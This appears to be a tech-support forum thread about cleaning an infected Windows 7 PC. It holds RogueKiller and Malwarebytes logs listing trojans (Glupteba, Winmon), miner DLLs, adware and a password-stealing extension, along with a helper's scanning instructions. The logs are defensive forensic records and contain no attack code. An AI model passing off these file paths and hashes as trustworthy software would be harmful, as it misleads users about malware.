[Suspicious.Path (Potentially Malicious)] jyilyw2tcff.exe (4324) – C:\Users\Ohm\AppData\Roaming\3xntztslram\jyilyw2tcff.exe -> Found
[Suspicious.Path (Potentially Malicious)] jyilyw2tcff.tmp (4392) – C:\Users\Ohm\AppData\Local\Temp\is-QLH4N.tmp\jyilyw2tcff.tmp -> Found
[Suspicious.Path (Potentially Malicious)] Guard.exe (4476) – C:\Users\Ohm\AppData\Roaming\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Guard.exe -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Tr.Winmon (Malicious)] Winmon (0) – \??\C:\Windows\System32\drivers\Winmon.sys -> Found
[Tr.Winmon (Malicious)] WinmonProcessMonitor (0) – \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] \SystemMaintanceTask – C:\Users\Ohm\AppData\Roaming\Battlefleet.Gothic.Armada.v1.8.10317+3DLC\dttdxdkt.exe [/upgradeid=f561932c-0bef-41b9-9289-b7d5c099b86b] -> Found
[Suspicious.Path (Potentially Malicious)] \{968E5A7B-F380-48CF-9963-F59954BAF532} – C:\Windows\system32\pcalua.exe [-a C:\Windows\DIIUnin.exe -c C:\Windows\DIIUnin.dat] -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> O4 - Run
  [Suspicious.Path (Potentially Malicious)] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run|kissq – C:\Users\Ohm\AppData\Local\Temp\kissq.exe (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|2221891 – "C:\Users\Ohm\AppData\Roaming\rxkbz25zqhh\q1rhluhcq3z.exe" /VERYSILENT -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|9055455 – "C:\Users\Ohm\AppData\Roaming\eu4rgpytxsg\mdgj1d4hgv2.exe" /VERYSILENT -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|5226075 – "C:\Users\Ohm\AppData\Roaming\pwzzfimxnz2\y53vmvtzyzf.exe" /VERYSILENT -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|6178603 – "C:\Users\Ohm\AppData\Roaming\3xntztslram\jyilyw2tcff.exe" /VERYSILENT -> Found
>>>>>> O23 - Services
  [Tr.Winmon (Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Winmon – C:\Windows\System32\drivers\Winmon.sys (missing) -> Found
  [Tr.Winmon (Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WinmonProcessMonitor – C:\Windows\System32\drivers\WinmonProcessMonitor.sys (missing) -> Found
  [Tr.Winmon (Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Winmon – C:\Windows\System32\drivers\Winmon.sys (missing) -> Found
  [Tr.Winmon (Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WinmonProcessMonitor – C:\Windows\System32\drivers\WinmonProcessMonitor.sys (missing) -> Found
>>>>>> O87 - Firewall
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{BEA5E3FA-C2CC-4C60-8E29-8206C5CC7234} – v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe|Name=CloudNet| (C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe) -> Found
  [Tr.Chapak (Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2E2BB14A-F1C1-4C1C-9DAE-A063E6C1598B} – v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Windows\rss\csrss.exe|Name=csrss| (C:\Windows\rss\csrss.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{BEA5E3FA-C2CC-4C60-8E29-8206C5CC7234} – v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe|Name=CloudNet| (C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe) -> Found
  [Tr.Chapak (Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2E2BB14A-F1C1-4C1C-9DAE-A063E6C1598B} – v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Windows\rss\csrss.exe|Name=csrss| (C:\Windows\rss\csrss.exe) (missing) -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.AutoIt.Gen (Potentially Malicious)] (file) AutoClicker.exe – C:\KITT ENDS!\5th!\AutoClicker.exe -> Found
[PUP.AutoIt.Gen (Potentially Malicious)] (file) AutoClicker.exe – C:\KITT ENDS!\8th!\AutoClicker.exe -> Found
[Tr.Gen (Malicious)] (folder) csrss – C:\Users\Ohm\AppData\Local\Temp\csrss -> Found

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 

 

RogueKiller Anti-Malware V14.7.3.0 (x64) [Sep 15 2020] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : Ohm [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20200213_081045, Driver : Loaded
Mode : Standard Scan, Delete – Date : 2020/10/02 21:16:35 (Duration : 00:24:23)
Switches : -minimize

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Delete ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] mdgj1d4hgv2.exe – %_Ohm_appdata%\eu4rgpytxsg\mdgj1d4hgv2.exe -> Killed [Tree]
[Suspicious.Path (Potentially Malicious)] q1rhluhcq3z.exe – %_Ohm_appdata%\rxkbz25zqhh\q1rhluhcq3z.exe -> Killed [Tree]
[Suspicious.Path (Potentially Malicious)] q1rhluhcq3z.tmp – %localappdata%\Temp\is-H9477.tmp\q1rhluhcq3z.tmp ->
[Suspicious.Path (Potentially Malicious)] mdgj1d4hgv2.tmp – %localappdata%\Temp\is-7D64V.tmp\mdgj1d4hgv2.tmp ->
[Suspicious.Path (Potentially Malicious)] y53vmvtzyzf.exe – %_Ohm_appdata%\pwzzfimxnz2\y53vmvtzyzf.exe -> Killed [Tree]
[Suspicious.Path (Potentially Malicious)] y53vmvtzyzf.tmp – %localappdata%\Temp\is-JEH9T.tmp\y53vmvtzyzf.tmp ->
[Suspicious.Path (Potentially Malicious)] jyilyw2tcff.exe – %_Ohm_appdata%\3xntztslram\jyilyw2tcff.exe -> Killed [Tree]
[Suspicious.Path (Potentially Malicious)] jyilyw2tcff.tmp – %localappdata%\Temp\is-QLH4N.tmp\jyilyw2tcff.tmp ->
[Suspicious.Path (Potentially Malicious)] Guard.exe – %_Ohm_appdata%\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Guard.exe -> Killed [Tree]
[Tr.Winmon (Malicious)] Winmon – %SystemRoot%\System32\drivers\Winmon.sys -> Stopped
[Tr.Winmon (Malicious)] WinmonProcessMonitor – %SystemRoot%\System32\drivers\WinmonProcessMonitor.sys -> Stopped
[Suspicious.Path (Potentially Malicious)] \SystemMaintanceTask – C:\Users\Ohm\AppData\Roaming\Battlefleet.Gothic.Armada.v1.8.10317+3DLC\dttdxdkt.exe (/upgradeid=f561932c-0bef-41b9-9289-b7d5c099b86b) -> Deleted
[Suspicious.Path (Potentially Malicious)] \{968E5A7B-F380-48CF-9963-F59954BAF532} – C:\Windows\system32\pcalua.exe (-a C:\Windows\DIIUnin.exe -c C:\Windows\DIIUnin.dat) -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run|kissq – [%localappdata%\Temp\kissq.exe] -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|2221891 – [%_Ohm_appdata%\rxkbz25zqhh\q1rhluhcq3z.exe] -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|9055455 – [%_Ohm_appdata%\eu4rgpytxsg\mdgj1d4hgv2.exe] -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|5226075 – [%_Ohm_appdata%\pwzzfimxnz2\y53vmvtzyzf.exe] -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_USERS\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Windows\CurrentVersion\Run|6178603 – [%_Ohm_appdata%\3xntztslram\jyilyw2tcff.exe] -> Deleted
[Tr.Winmon (Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Winmon – [%SystemRoot%\System32\drivers\Winmon.sys] -> Deleted
[Tr.Winmon (Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WinmonProcessMonitor – [%SystemRoot%\System32\drivers\WinmonProcessMonitor.sys] -> Deleted
[Tr.Winmon (Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Winmon – [%SystemRoot%\System32\drivers\Winmon.sys] -> Deleted
[Tr.Winmon (Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WinmonProcessMonitor – [%SystemRoot%\System32\drivers\WinmonProcessMonitor.sys] -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{BEA5E3FA-C2CC-4C60-8E29-8206C5CC7234} – [%_Ohm_appdata%\3d03298b616c\3d03298b616c.exe] -> Deleted
[Tr.Chapak (Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2E2BB14A-F1C1-4C1C-9DAE-A063E6C1598B} – [%SystemRoot%\rss\csrss.exe] -> Deleted
[Suspicious.Path (Potentially Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{BEA5E3FA-C2CC-4C60-8E29-8206C5CC7234} – [%_Ohm_appdata%\3d03298b616c\3d03298b616c.exe] -> Deleted
[Tr.Chapak (Malicious)] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2E2BB14A-F1C1-4C1C-9DAE-A063E6C1598B} – [%SystemRoot%\rss\csrss.exe] -> Deleted
[PUP.AutoIt.Gen (Potentially Malicious)] AutoClicker.exe – %SystemDrive%\KITT ENDS!\5th!\AutoClicker.exe -> Deleted
[PUP.AutoIt.Gen (Potentially Malicious)] AutoClicker.exe – %SystemDrive%\KITT ENDS!\8th!\AutoClicker.exe -> Deleted
[Tr.Gen (Malicious)] csrss – %localappdata%\Temp\csrss -> Deleted
  => 3d03298b616c.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\3D0329~1.EXE -> Deleted
  => cloudnet.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\cloudnet.exe -> Deleted
  => collectchromefingerprint.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\COLLEC~1.EXE -> Deleted
  => getclhash3.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\GETCLH~1.EXE -> Deleted
  => scheduled.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\SCHEDU~1.EXE -> Deleted
  => u20200626.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\U20200~1.EXE -> Deleted
  => w20200508.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\W20200~1.EXE -> Deleted
  => wup.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\wup\xarch\wup.exe -> Deleted
  => xarch – C:\Users\Ohm\AppData\Local\Temp\csrss\wup\xarch -> Deleted
  => wup – C:\Users\Ohm\AppData\Local\Temp\csrss\wup -> Deleted
  => ww21.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\ww21.exe -> Deleted
  => ww23.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\ww23.exe -> Deleted
  => ww24.exe – C:\Users\Ohm\AppData\Local\Temp\csrss\ww24.exe -> Deleted
 

 

Ok that was still too long, I even tried with code brackets. I'm not sure if your forum tools has something for that but I just decided to go ahead and attach it instead.

Attachments:

The next available download for this computer would be Windows 10?
 
This computer is/was very infected.

If you're already running Malwarebytes 3 then open Malwarebytes and check for updates.
Then click on the Scan tab and select Threat Scan and click on Start Scan button.
If you don't have Malwarebytes 3 installed yet please download it from here and install it Here
Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.

Allow it to quarantine everything it  finds.

Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

ESET Online Scanner

Download ESET Online Scanner and save it to your desktop.

Right-click on esetonlinescanner_enu.exe and select Run as Administrator.

  • When the tool opens, click Get Started.
  • Read and accept the license agreement.
  • At the Welcome to ESET Online Scanner window, click Get Started.
  • Select whether you would like to send anonymous data to ESET.
  • Note: if you see the "Welcome Back to ESET Online Scanner" screen, click Computer Scan > Full Scan.
  • Click on the Full Scan option.
  • Select Enable ESET to detect and remove potentially unwanted applications, then click Start scan.
  • ESET will now begin scanning your computer. This may take some time.
  • When the scan is finished and if threats have been detected, select Save scan log. Save it to your desktop as eset.txt. Click on Continue.
  • ESET Online Scanner may ask if you'd like to turn on the Periodic Scan feature. Click on Continue.
  • On the next screen, you can leave feedback about the program if you wish. Check the box for Delete application data on closing. If you left feedback, click Submit and continue. If not, Close without feedback.
  • Open the scan log on your desktop (eset.txt) and copy and paste its contents into your next reply.

————————————-

Please post these 2 logs when finished.
 

ESET took quite a while, and found a lot of stuff but a lot of those were game trainers, which can possibly be harmless so it probably isn't as bad as it looks, lol.

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 10/3/20
Scan Time: 10:20 AM
Log File: e2a7ded4-0548-11eb-a0a9-00ffeead1dfb.json

-Software Information-
Version: 4.2.1.89
Components Version: 1.0.1045
Update Package Version: 1.0.30712
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: 4Watt\Ohm

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 407368
Threats Detected: 95
Threats Quarantined: 93
Time Elapsed: 46 min, 3 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 4
Adware.Tuto4PC.Generic, C:\Program Files\YO61W6OW76\YO61W6OW7.exe, Quarantined, 3729, 404709, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\PP9DKL5E1V\SRBJZ6QBU.EXE, Quarantined, 12644, 827982, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\DHLDSABHZ1\DHLDSABHZ.EXE, Quarantined, 12644, 827982, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\KSPH2GUN0K\KSPH2GUN0.EXE, Quarantined, 12644, 827982, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB

Module: 4
Adware.Tuto4PC.Generic, C:\Program Files\YO61W6OW76\YO61W6OW7.exe, Quarantined, 3729, 404709, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\PP9DKL5E1V\SRBJZ6QBU.EXE, Quarantined, 12644, 827982, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\DHLDSABHZ1\DHLDSABHZ.EXE, Quarantined, 12644, 827982, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\KSPH2GUN0K\KSPH2GUN0.EXE, Quarantined, 12644, 827982, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB

Registry Key: 8
Trojan.Glupteba.E, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\b4f99fd0, Quarantined, 505, 821174, 1.0.30712, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\bestavicampaign563, Quarantined, 533, 584322, 1.0.30712, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\campaign9961, Quarantined, 533, 518478, 1.0.30712, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\multitimercampaign84170, Quarantined, 533, 518476, 1.0.30712, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IOBIT_MONITOR_SERVER, Quarantined, 3835, 580520, 1.0.30712, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\AdvancedSystemCareService13, Quarantined, 3835, 380352, 1.0.30712, , ame, , ,
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\3D03298B616C, Quarantined, 502, 847709, , , , , ,
Malware.AI.1427837911, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ScrSnap, Quarantined, 1000000, 0, , , , , ,

Registry Value: 14
PUP.Optional.AdvancedSystemCare, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|ADVANCED SYSTEMCARE, Quarantined, 3835, 380353, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|FQQWIFBA302XRUP, Quarantined, 3729, 392931, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|XUEJ4LT5311PQFE, Quarantined, 3729, 392931, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8OCX03D8R2LO1ST, Quarantined, 3729, 392931, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|95MRWWWEKU580L8, Quarantined, 3729, 392931, 1.0.30712, , ame, , ,
Trojan.Glupteba.E, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\b4f99fd0|CAMPAIGNID, Quarantined, 505, 821174, 1.0.30712, , ame, , ,
PUM.Optional.DisableMRT, HKLM\SOFTWARE\POLICIES\MICROSOFT\MRT|DONTREPORTINFECTIONINFORMATION, Quarantined, 6904, 676881, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE|OCYXFV2LNHY, Quarantined, 3729, 730662, 1.0.30712, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IOBIT_MONITOR_SERVER|IMAGEPATH, Quarantined, 3835, 580520, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|FQQWIFBA302XRUP, Quarantined, 3729, 404709, , , , , ,
Adware.WizzMonetize, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|XUEJ4LT5311PQFE, Quarantined, 12644, 827982, , , , , ,
Adware.WizzMonetize, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|95MRWWWEKU580L8, Quarantined, 12644, 827982, , , , , ,
Adware.WizzMonetize, HKU\S-1-5-21-546064741-869659242-2245885051-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8OCX03D8R2LO1ST, Quarantined, 12644, 827982, , , , , ,
PUM.Optional.DisableMRT, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\MRT|DONTREPORTINFECTIONINFORMATION, Quarantined, 6904, 676881, 1.0.30712, , ame, , ,

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 7
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\YO61W6OW76, Quarantined, 3729, 404709, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\KSPH2GUN0K, Removal Failed, 3729, 404709, 1.0.30712, , ame, , ,
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0, Quarantined, 2620, 784087, , , , , ,
PUP.Optional.BookHelper, C:\USERS\OHM\APPDATA\ROAMING\OPERA SOFTWARE\OPERA STABLE\EXTENSIONS\ICJFCIIJODMGNKHMGKICBFGIEPAFMHGA, Quarantined, 2620, 784087, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\DHLDSABHZ1, Removal Failed, 3729, 404709, 1.0.30712, , ame, , ,
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\PP9DKL5E1V, Quarantined, 3729, 404709, 1.0.30712, , ame, , ,
Spyware.PasswordStealer, C:\USERS\OHM\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\ICJFCIIJODMGNKHMGKICBFGIEPAFMHGA, Quarantined, 560, 847708, 1.0.30712, , ame, , ,

File: 58
Trojan.Agent, C:\USERS\OHM\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\GUARD.LNK, Quarantined, 502, 459851, 1.0.30712, , ame, , 7DD166253116F8B4F5158547747975CC, 64D75F17215F51911CA368B9CDAD8E4826FAA2253D720FEAFB84F33025AB9E00
RiskWare.BitCoinMiner, C:\USERS\OHM\APPDATA\ROAMING\APPCONTAINER\STORAGE\microsoft.microsoftedge_8wekyb3d8bbwe\CHILDREN\001\INTERNET SETTINGS\cuda_djezo.dll, Delete-on-Reboot, 875, 515270, 1.0.30712, , ame, , ,
RiskWare.BitCoinMiner, C:\USERS\OHM\APPDATA\ROAMING\APPCONTAINER\STORAGE\microsoft.microsoftedge_8wekyb3d8bbwe\CHILDREN\001\INTERNET SETTINGS\cuda_tromp.dll, Quarantined, 875, 515270, 1.0.30712, , ame, , B5C3E2D018FE7277CE30D7CD8F9556F4, FC20D725D5AEAEB0DEC825FB613EF0CA01A2B0E33AB9B390EB3A5386BF604AA6
RiskWare.BitCoinMiner, C:\USERS\OHM\APPDATA\ROAMING\APPCONTAINER\STORAGE\microsoft.microsoftedge_8wekyb3d8bbwe\CHILDREN\001\INTERNET SETTINGS\cuda_tromp_75.dll, Quarantined, 875, 515270, 1.0.30712, , ame, , C617989457317F8E1560BE0CA77D6B47, 7A5E6CB654857B0A4399628441387DE6A9D2B4A54DE4BA8818D550EA0A0E88B7
Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\WCZE\206367889.EXE, Quarantined, 3729, 730662, , , , , D2738BEBCBE1AF1509F209B7C1220285, 6DEBDCA8087E75C04D524F6040083A7E0DAC827C3B30635A721CB4102CE01AFC
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\YO61W6OW76\CAST.CONFIG, Quarantined, 3729, 404709, 1.0.30712, , ame, , D4FFB1C72D21F1739838BB9F567B4FFB, D00723131B3DC667820EFFADF112BA8C842806090367B4DE897D61A1BD61A7BA
Adware.Tuto4PC.Generic, C:\Program Files\YO61W6OW76\uninstaller.exe, Quarantined, 3729, 404709, , , , , FDD3C212CBEECBF7342194EE4CAE3668, 8CE3816BC69F1AA48712F8F0E48FA06DAD1D7F580AFD1DFEADF486BF5EEA22F3
Adware.Tuto4PC.Generic, C:\Program Files\YO61W6OW76\uninstaller.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
Adware.Tuto4PC.Generic, C:\Program Files\YO61W6OW76\YO61W6OW7.exe, Quarantined, 3729, 404709, , , , , F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.Tuto4PC.Generic, C:\Program Files\YO61W6OW76\YO61W6OW7.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
Adware.WizzMonetize, C:\PROGRAM FILES\PP9DKL5E1V\SRBJZ6QBU.EXE, Quarantined, 12644, 827982, 1.0.30712, B0741CE6E8E1EE70F1DBDA78, dds, 00923412, F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\KSPH2GUN0K\CAST.CONFIG, Quarantined, 3729, 404709, 1.0.30712, , ame, , 88F03F2242CB71B54C369D753DFF2B74, B6A80EE2E0165F3BBB1FB854B2309F98EE23633B35243684F37155588BCA2944
Adware.Tuto4PC.Generic, C:\Program Files\KSPH2GUN0K\KSPH2GUN0.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
